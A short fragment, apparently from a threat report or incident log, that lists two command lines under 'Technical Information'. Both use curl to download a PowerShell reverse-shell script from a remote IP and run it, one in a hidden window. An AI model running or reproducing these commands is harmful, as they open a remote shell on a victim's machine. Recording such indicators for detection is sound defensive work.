Technical Information
- '<SYSTEM32>\cmd.exe' /c curl -s http://78.##.17.88:8443/reverse.ps1 --output %temp%\reverse.ps1 && powershell.exe %temp%\reverse.ps1 78.85.17.88 9991
- '<SYSTEM32>\cmd.exe' /c curl -s http://78.##.17.88:8443/reverse.ps1 --output %temp%\reverse.ps1 && powershell.exe %temp%\reverse.ps1 78.85.17.88 9991' (with hidden window)